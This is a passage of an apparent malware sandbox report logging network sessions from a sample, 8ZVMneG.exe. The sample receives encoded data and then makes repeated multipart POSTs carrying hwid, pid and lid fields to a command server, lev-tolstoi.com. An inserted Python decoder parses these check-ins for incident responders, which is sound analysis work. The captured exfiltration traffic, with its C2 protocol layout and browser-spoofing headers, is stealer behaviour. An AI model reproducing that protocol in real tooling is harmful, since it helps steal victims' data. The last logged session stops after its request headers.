                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC248INData Raw: 63 34 38 0d 0a 75 37 39 31 43 30 71 73 6e 76 47 4f 38 30 4e 73 62 6f 79 6b 62 35 52 50 35 71 6d 70 67 65 41 67 55 51 74 64 54 54 6f 44 55 46 48 41 6e 51 4d 70 63 4a 69 79 30 2f 32 57 59 56 59 61 2f 74 45 4b 75 47 32 48 7a 59 75 37 68 6b 45 39 65 44 68 68 47 48 55 39 63 34 48 5a 46 47 63 35 79 62 4c 54 36 34 74 68 56 6a 58 33 68 67 72 36 62 64 79 4c 7a 4f 75 43 51 54 31 70 50 43 5a 56 63 7a 77 79 30 39 4d 53 59 79 2f 50 2b 70 44 69 6e 69 59 4a 43 2b 33 4f 41 66 30 69 6a 73 53 4c 72 63 4a 46 4b 79 6c 6e 62 33 64 6d 4a 44 44 32 33 67 5a 67 61 4e 47 79 69 71 79 57 4c 55 35 55 72 73 55 4b 39 69 4f 41 7a 63 4c 70 69 45 67 31 61 44 6b 6e 53 6d 6f 32 4f 64 50 64 45 57 49 6c 78 75 36 64 36 4a 6b 74 44 77 48 74 68 6b 4f 32 4b 70 79 4c 6b 36 50
                                                                                                                                                                                                                                                                Data Ascii: c48u791C0qsnvGO80Nsboykb5RP5qmpgeAgUQtdTToDUFHAnQMpcJiy0/2WYVYa/tEKuG2HzYu7hkE9eDhhGHU9c4HZFGc5ybLT64thVjX3hgr6bdyLzOuCQT1pPCZVczwy09MSYy/P+pDiniYJC+3OAf0ijsSLrcJFKylnb3dmJDD23gZgaNGyiqyWLU5UrsUK9iOAzcLpiEg1aDknSmo2OdPdEWIlxu6d6JktDwHthkO2KpyLk6P
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 52 63 44 42 34 4c 6a 70 56 63 54 52 7a 78 70 4d 4f 4b 53 2f 43 76 4d 75 73 6d 53 30 41 43 65 33 4a 43 76 63 74 6c 73 54 4c 34 49 70 4b 4e 32 4d 77 49 46 64 76 4f 44 54 52 31 42 42 6d 4c 38 62 36 6e 4f 2f 52 62 30 34 4c 39 6f 5a 56 74 67 32 55 79 4d 6a 33 6a 31 4e 7a 64 6e 45 32 47 47 59 2b 63 34 47 64 45 57 63 70 77 2f 79 42 35 4a 6f 71 43 78 37 6c 7a 77 44 37 4c 59 6e 42 78 4f 43 43 52 54 6c 6a 4d 43 56 63 62 44 38 31 32 64 31 58 4a 32 6a 4a 35 4e 4f 30 30 51 49 4c 48 4f 6e 4b 47 37 51 58 78 4e 53 46 2b 73 4a 46 50 79 6c 6e 62 31 42 6b 4d 54 44 53 30 68 52 68 49 39 7a 38 67 65 71 63 4a 42 77 4b 36 38 67 48 39 54 2b 4f 78 63 33 67 69 30 6b 36 62 44 67 72 47 43 39 79 4e 4d 47 64 54 79 6b 4a 77 2f 65 66 35 6f 59 68 54 68 4f 67 33 30 33 78 49 63 53 54 69 2b
                                                                                                                                                                                                                                                                Data Ascii: RcDB4LjpVcTRzxpMOKS/CvMusmS0ACe3JCvctlsTL4IpKN2MwIFdvODTR1BBmL8b6nO/Rb04L9oZVtg2UyMj3j1NzdnE2GGY+c4GdEWcpw/yB5JoqCx7lzwD7LYnBxOCCRTljMCVcbD812d1XJ2jJ5NO00QILHOnKG7QXxNSF+sJFPylnb1BkMTDS0hRhI9z8geqcJBwK68gH9T+Oxc3gi0k6bDgrGC9yNMGdTykJw/ef5oYhThOg303xIcSTi+
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 4a 33 38 6f 51 43 46 71 63 2f 50 65 41 32 6f 69 6a 4d 6d 51 34 70 38 6d 47 45 7a 78 69 42 53 32 4b 6f 69 4c 6b 36 4f 50 51 7a 74 76 4c 53 42 56 59 6a 77 39 31 74 67 59 59 53 6a 4f 38 5a 62 6f 6d 69 6f 4e 41 65 72 55 42 2f 59 6c 67 63 72 42 36 63 49 4d 63 32 34 6e 62 77 41 68 41 79 54 53 6e 79 4a 71 4a 73 44 37 68 61 79 4f 62 78 64 4d 36 63 70 4e 72 6d 32 4a 77 38 37 6d 6a 55 4d 35 5a 7a 6f 6c 56 47 6b 38 4d 4d 76 53 45 32 6b 6b 78 76 61 65 34 70 55 70 42 77 66 6c 77 41 33 33 4a 38 53 46 69 2b 53 61 41 6d 73 70 43 79 68 55 62 44 31 78 37 4e 34 5a 5a 79 2f 59 76 49 79 69 69 47 45 4a 41 4b 36 65 54 66 6f 6b 68 4d 44 42 35 34 4a 46 50 6d 77 38 4b 46 74 73 4e 54 6e 58 32 68 4e 6c 49 63 50 36 6b 2b 75 56 4a 42 77 4a 35 38 6f 42 74 6d 50 45 7a 4e 4f 6a 32 67 49
                                                                                                                                                                                                                                                                Data Ascii: J38oQCFqc/PeA2oijMmQ4p8mGEzxiBS2KoiLk6OPQztvLSBVYjw91tgYYSjO8ZbomioNAerUB/YlgcrB6cIMc24nbwAhAyTSnyJqJsD7hayObxdM6cpNrm2Jw87mjUM5ZzolVGk8MMvSE2kkxvae4pUpBwflwA33J8SFi+SaAmspCyhUbD1x7N4ZZy/YvIyiiGEJAK6eTfokhMDB54JFPmw8KFtsNTnX2hNlIcP6k+uVJBwJ58oBtmPEzNOj2gI
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC165INData Raw: 77 41 68 4f 7a 72 4c 30 78 6c 67 4a 63 6a 30 6c 4f 4b 63 4b 67 67 48 36 63 45 4c 2b 79 57 4a 7a 73 6a 69 68 6b 67 68 61 6a 51 6c 56 57 74 79 66 5a 6e 61 44 79 6c 77 6a 74 75 66 78 59 45 36 48 42 71 75 32 55 50 76 62 59 50 48 69 37 76 43 51 54 78 67 4d 43 64 51 62 6a 30 33 31 39 73 52 5a 43 33 42 39 6f 48 6b 6e 79 77 46 41 2b 58 55 44 66 73 70 69 4d 2f 44 36 49 67 43 66 53 6b 34 4e 78 67 35 63 67 62 55 30 68 64 71 50 6f 37 6a 33 66 58 52 4a 67 4a 4d 74 6f 59 42 2b 43 32 4c 78 38 66 6f 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: wAhOzrL0xlgJcj0lOKcKggH6cEL+yWJzsjihkghajQlVWtyfZnaDylwjtufxYE6HBqu2UPvbYPHi7vCQTxgMCdQbj0319sRZC3B9oHknywFA+XUDfspiM/D6IgCfSk4Nxg5cgbU0hdqPo7j3fXRJgJMtoYB+C2Lx8fo
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 33 63 64 34 0d 0a 69 6b 4d 2f 5a 7a 67 71 55 57 6b 36 49 64 6a 5a 48 32 67 6d 77 66 32 58 36 5a 51 6c 43 51 6a 6f 79 55 32 34 62 59 50 54 69 37 76 43 62 52 52 63 66 51 35 69 49 53 31 39 77 4a 30 51 5a 57 69 57 76 4a 2f 76 6e 53 6b 42 43 75 66 4b 42 2f 38 6d 69 4d 44 50 37 34 74 48 4e 57 67 36 4b 6c 6c 6c 50 6a 6e 66 33 68 52 6d 4a 38 48 30 30 36 4c 52 4a 68 5a 4d 74 6f 59 6f 34 53 61 4b 7a 59 76 38 7a 46 74 7a 62 6a 4e 76 41 43 45 2b 4f 74 2f 62 45 6d 55 70 79 50 53 57 35 4a 55 67 43 41 72 74 79 51 6e 7a 4c 49 76 50 78 2b 32 49 51 7a 4a 6c 4e 43 42 54 5a 48 4a 39 6d 64 6f 50 4b 58 43 4f 7a 5a 44 36 68 6a 45 43 54 50 47 49 46 4c 59 71 69 49 75 54 6f 34 4e 51 4f 57 4d 78 4b 6c 64 6b 4d 54 7a 65 30 42 46 6c 49 73 66 30 6c 65 4f 59 4d 77 30 41 34 4d 45 44 2b
                                                                                                                                                                                                                                                                Data Ascii: 3cd4ikM/ZzgqUWk6IdjZH2gmwf2X6ZQlCQjoyU24bYPTi7vCbRRcfQ5iIS19wJ0QZWiWvJ/vnSkBCufKB/8miMDP74tHNWg6KlllPjnf3hRmJ8H006LRJhZMtoYo4SaKzYv8zFtzbjNvACE+Ot/bEmUpyPSW5JUgCArtyQnzLIvPx+2IQzJlNCBTZHJ9mdoPKXCOzZD6hjECTPGIFLYqiIuTo4NQOWMxKldkMTze0BFlIsf0leOYMw0A4MED+
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 45 35 49 56 4c 4f 48 73 31 4b 46 39 71 4f 6a 6a 57 32 77 56 6c 4a 74 7a 35 67 66 37 52 62 30 34 4c 39 6f 5a 56 74 68 75 44 32 39 76 67 77 48 4d 6c 61 69 6b 6b 56 57 31 79 4c 4a 66 45 56 32 34 6b 6a 71 54 54 36 70 34 6f 44 51 50 76 7a 77 48 37 4b 49 33 4f 79 75 57 47 53 44 6c 70 4f 53 6c 5a 5a 44 67 77 32 4e 63 65 62 69 44 4a 2f 34 47 73 33 32 45 4a 46 4b 36 65 54 64 38 71 6c 73 58 62 6f 35 30 4d 4b 69 6b 34 49 78 67 35 63 6a 66 54 30 68 4e 75 4a 4d 6a 35 6c 65 47 51 4c 67 38 4d 34 63 49 47 2f 79 75 46 78 73 37 75 68 6c 41 35 59 6a 41 6a 55 57 30 2f 63 35 65 64 45 48 46 6f 6c 72 79 69 34 5a 38 76 43 52 71 75 32 55 50 76 62 59 50 48 69 37 76 43 51 7a 39 6d 50 43 42 62 59 6a 4d 35 79 38 38 62 59 43 44 4c 38 4a 6a 69 6c 7a 4d 49 41 2b 66 46 44 76 38 71 6a 4d
                                                                                                                                                                                                                                                                Data Ascii: E5IVLOHs1KF9qOjjW2wVlJtz5gf7Rb04L9oZVthuD29vgwHMlaikkVW1yLJfEV24kjqTT6p4oDQPvzwH7KI3OyuWGSDlpOSlZZDgw2NcebiDJ/4Gs32EJFK6eTd8qlsXbo50MKik4Ixg5cjfT0hNuJMj5leGQLg8M4cIG/yuFxs7uhlA5YjAjUW0/c5edEHFolryi4Z8vCRqu2UPvbYPHi7vCQz9mPCBbYjM5y88bYCDL8JjilzMIA+fFDv8qjM
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 52 53 49 70 5a 7a 6c 49 64 6a 55 73 6c 38 52 58 62 69 53 4f 70 4e 50 71 6d 43 63 4a 43 75 44 55 43 50 41 69 69 38 4c 43 35 34 70 42 4d 32 30 37 4b 46 31 69 50 6a 6a 65 33 68 68 74 49 63 44 31 6e 4b 7a 66 59 51 6b 55 72 70 35 4e 31 7a 61 48 78 38 61 6a 6e 51 77 71 4b 54 67 6a 47 44 6c 79 50 39 66 59 46 32 4d 75 79 76 6d 56 35 70 51 68 42 51 2f 68 77 67 76 79 49 6f 54 41 77 75 4b 45 52 7a 6c 69 4f 53 4a 62 5a 7a 52 7a 6c 35 30 51 63 57 69 57 76 4c 50 33 6e 43 30 4a 54 50 47 49 46 4c 59 71 69 49 75 54 6f 34 6c 4f 4e 32 34 2f 49 6c 74 70 4e 7a 66 54 32 42 64 68 4f 73 62 38 6c 50 36 44 49 51 63 4a 34 73 55 4e 38 69 75 4e 7a 63 6a 6e 77 67 78 7a 62 69 64 76 41 43 45 66 50 39 37 30 45 48 4a 6f 30 62 4b 4b 72 4a 59 74 54 6c 53 75 78 77 62 38 49 6f 6e 49 7a 65 43
                                                                                                                                                                                                                                                                Data Ascii: RSIpZzlIdjUsl8RXbiSOpNPqmCcJCuDUCPAii8LC54pBM207KF1iPjje3hhtIcD1nKzfYQkUrp5N1zaHx8ajnQwqKTgjGDlyP9fYF2MuyvmV5pQhBQ/hwgvyIoTAwuKERzliOSJbZzRzl50QcWiWvLP3nC0JTPGIFLYqiIuTo4lON24/IltpNzfT2BdhOsb8lP6DIQcJ4sUN8iuNzcjnwgxzbidvACEfP970EHJo0bKKrJYtTlSuxwb8IonIzeC
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 51 59 32 47 48 64 79 61 34 75 54 56 33 74 6f 6c 72 7a 55 37 34 4d 7a 43 41 2f 34 78 55 72 49 45 36 50 64 77 65 53 53 52 53 52 6d 66 32 45 59 62 6e 4a 72 34 4a 30 65 62 6a 50 66 36 70 37 38 6c 6d 45 78 51 71 37 65 54 61 35 74 73 63 6a 46 37 59 56 55 49 69 51 59 4f 56 4a 6d 49 6a 54 4f 30 6c 63 6e 61 4d 69 38 79 37 2f 66 59 51 6f 64 72 70 35 64 70 48 62 52 6d 4a 79 7a 30 46 31 39 63 48 38 35 47 44 6c 67 66 5a 6e 50 56 7a 46 6f 69 66 2b 42 2f 70 63 69 47 41 2b 70 2b 44 50 52 4e 34 6e 4e 33 50 4b 38 66 44 52 7a 4d 69 6c 50 63 48 34 6d 32 74 4d 5a 62 6a 36 4f 73 74 50 6a 30 58 6b 33 54 4b 61 47 4d 72 68 74 6e 49 75 54 6f 37 64 42 50 57 63 34 4f 55 6b 73 46 53 6e 55 32 77 42 34 61 49 43 38 6c 61 7a 4a 63 55 42 4d 36 74 64 4e 72 6e 33 57 6b 4a 36 77 31 52 4a 68
                                                                                                                                                                                                                                                                Data Ascii: QY2GHdya4uTV3tolrzU74MzCA/4xUrIE6PdweSSRSRmf2EYbnJr4J0ebjPf6p78lmExQq7eTa5tscjF7YVUIiQYOVJmIjTO0lcnaMi8y7/fYQodrp5dpHbRmJyz0F19cH85GDlgfZnPVzFoif+B/pciGA+p+DPRN4nN3PK8fDRzMilPcH4m2tMZbj6OstPj0Xk3TKaGMrhtnIuTo7dBPWc4OUksFSnU2wB4aIC8lazJcUBM6tdNrn3WkJ6w1RJh
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 5a 30 4d 54 33 58 32 67 46 34 61 49 43 38 6e 4b 7a 4a 47 45 35 45 72 76 6c 44 74 6a 58 45 6b 34 76 57 67 55 77 39 62 69 6b 2b 46 55 59 38 4e 4e 6a 4c 42 33 34 6e 6a 72 4c 54 36 74 46 35 58 45 4b 75 77 68 79 32 64 64 53 5a 6b 4c 62 52 46 57 4d 37 49 47 46 42 49 53 52 7a 67 59 39 5a 4b 54 71 4f 70 4e 4f 72 6b 6a 4d 63 43 75 33 51 44 72 45 54 75 75 7a 46 35 49 4e 55 49 33 34 77 59 48 5a 58 45 77 33 6e 79 42 52 6e 4a 73 6e 71 67 71 7a 66 59 51 46 4d 74 76 39 4e 76 6d 32 37 68 59 76 37 77 68 70 7a 58 44 77 68 56 6d 59 6b 49 70 54 36 47 57 34 70 32 4f 79 45 34 39 34 50 4f 43 32 75 69 45 33 77 62 64 79 5a 68 61 4f 47 55 33 4d 78 62 33 30 44 4e 47 46 6b 69 59 38 49 4a 7a 47 4f 36 74 4f 30 77 32 39 4f 48 71 36 65 54 62 45 75 6c 74 6e 4e 34 4a 52 42 64 46 63 42 43
                                                                                                                                                                                                                                                                Data Ascii: Z0MT3X2gF4aIC8nKzJGE5ErvlDtjXEk4vWgUw9bik+FUY8NNjLB34njrLT6tF5XEKuwhy2ddSZkLbRFWM7IGFBISRzgY9ZKTqOpNOrkjMcCu3QDrETuuzF5INUI34wYHZXEw3nyBRnJsnqgqzfYQFMtv9Nvm27hYv7whpzXDwhVmYkIpT6GW4p2OyE494POC2uiE3wbdyZhaOGU3Mxb30DNGFkiY8IJzGO6tO0w29OHq6eTbEultnN4JRBdFcBC


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.6 | 49748       | 104.21.66.86   | 443              | 2144 | C:\Users\user\Desktop\8ZVMneG.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:04:20 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=C5PLJO8RR7LUD8CMHBI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 12872
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:20 UTC12872OUTData Raw: 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62
                                                                                                                                                                                                                                                                Data Ascii: --C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="pid"2--C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="lid"LPnhqo--nb
2024-12-20 06:04:21 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:20 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=891dkufa0vvc5utqgggqlvdqgg; expires=Mon, 14 Apr 2025 23:50:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=awDKqHLI4AF0WHFJZMrYNW%2FcSmdLEDTv2PN0kiWDkC5UvfAjlnDWUwYPNMLlOj7DBJ1W6ACFNpiqAK7UAfpUp%2FXoFKz4KBYLgaqvyOwZQJ7%2B%2Fc1iqUjPnEiBaxgSBN1%2Bbx4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f33aef732e8-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1824&rtt_var=694&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13812&delivery_rate=1564844&cwnd=246&unsent_bytes=0&cid=244679ab460a4570&ts=838&x=0"
2024-12-20 06:04:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f\r\nok 8.46.123.189\r\n   (chunk-size line "f" = 15 bytes, followed by the 15-byte payload "ok 8.46.123.189")
2024-12-20 06:04:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n   (zero-length last chunk: end of the chunked response body)
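The two sessions to lev-tolstoi.com are the same exchange: a multipart/form-data POST to /api carrying hwid, pid and lid fields, answered with a chunked body whose only payload is the 15-byte string "ok 8.46.123.189". The decoder below is an added example, not part of the Joe Sandbox report or of the sample's own code. It decodes the chunked response exactly as captured above and extracts the form fields from a request body constructed to match the visible fragment: the boundary, hwid and pid are taken from the capture, while the lid value is truncated on this page, so the one used here is a made-up placeholder. The same chunk decoder applies to the first response in the capture, whose chunk-size lines c48 and 3cd4 are visible in the raw data.

```python
"""Added example: parse a LummaC-style C2 check-in of the shape captured above.

The request is multipart/form-data with hwid/pid/lid fields; the response body
is HTTP/1.1 chunked. The sample bytes below are constructed from the visible
fragments of the capture; the lid value is a placeholder, not the real one.
"""
import re
from typing import Dict

# Response body exactly as captured: "f\r\nok 8.46.123.189\r\n" then "0\r\n\r\n".
RESPONSE_BODY = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a"
    "30 0d 0a 0d 0a"
)

# Boundary, hwid and pid are those shown in the capture.
BOUNDARY = "C5PLJO8RR7LUD8CMHBI"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def _part(boundary: str, name: str, value: str) -> bytes:
    """Build one multipart/form-data part (constructed test input)."""
    return (
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
    ).encode()


REQUEST_BODY = (
    _part(BOUNDARY, "hwid", "DE39FCFBD83CCE4A00D57F9DDD37BE0C")
    + _part(BOUNDARY, "pid", "2")
    + _part(BOUNDARY, "lid", "PLACEHOLDER-LID")  # constructed; real value is truncated on the page
    + f"--{BOUNDARY}--\r\n".encode()
)


def decode_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-encoded body into its payload bytes."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunked body: no chunk-size line at offset %d" % pos)
        # The size is hex; anything after ';' is a chunk extension and is ignored.
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; optional trailers follow, not part of the payload
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk: expected %d bytes at offset %d" % (size, pos))
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("malformed chunk terminator at offset %d" % pos)
        pos += 2


def boundary_from_content_type(content_type: str) -> str:
    """Extract the multipart boundary from a Content-Type header value."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type: %r" % content_type)
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":  # preamble / closing "--" marker
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def summarize_checkin(host: str, content_type: str, request_body: bytes,
                      response_body: bytes) -> Dict[str, str]:
    """Pull the indicators a responder wants out of one request/response pair."""
    fields = parse_multipart(request_body, boundary_from_content_type(content_type))
    reply = decode_chunked(response_body)
    return {
        "host": host,
        "hwid": fields.get("hwid", b"").decode(errors="replace"),
        "pid": fields.get("pid", b"").decode(errors="replace"),
        "lid": fields.get("lid", b"").decode(errors="replace"),
        "reply": reply.decode(errors="replace"),
    }


if __name__ == "__main__":
    for k, v in summarize_checkin("lev-tolstoi.com", CONTENT_TYPE,
                                  REQUEST_BODY, RESPONSE_BODY).items():
        print(f"{k}: {v}")
```

The hwid is constant across both sessions in the capture, so it is the field to pivot on when correlating check-ins from the same host in a packet capture; the reply string is kept verbatim rather than interpreted, since the report does not say what the server-side string denotes.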


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.6 | 49754       | 104.21.66.86   | 443              | 2144 | C:\Users\user\Desktop\8ZVMneG.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:04:22 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=UB6YY78GPNR7GMOC0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 15106
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:22 UTC15106OUTData Raw: 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78
                                                                                                                                                                                                                                                                Data Ascii: --UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="pid"2--UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="lid"LPnhqo--nbgnxdlx
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:23 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=t5ocvu3tsdco4ui943q0i1l4jg; expires=Mon, 14 Apr 2025 23:51:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MupKHKlg%2FR6eGrwT1w65qapVZrlv%2BEmWgQ8mOamvVvripubck6GpfEilCG5zDNLMrQpGSB49vecoNGiNCD31vGAV%2FTW%2BWp5adgoAlJzH32zXHgE8f8Mxn20wrZgjPN3M7hU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f411f18429b-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2020&rtt_var=774&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=16044&delivery_rate=1399137&cwnd=237&unsent_bytes=0&cid=e472886c2374796c&ts=816&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49760 | 104.21.66.86 | 443 | 2144 | C:\Users\user\Desktop\8ZVMneG.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:04:24 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ICQ9J4SUMK0W7VEBGUY
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19976
    Host: lev-tolstoi.com
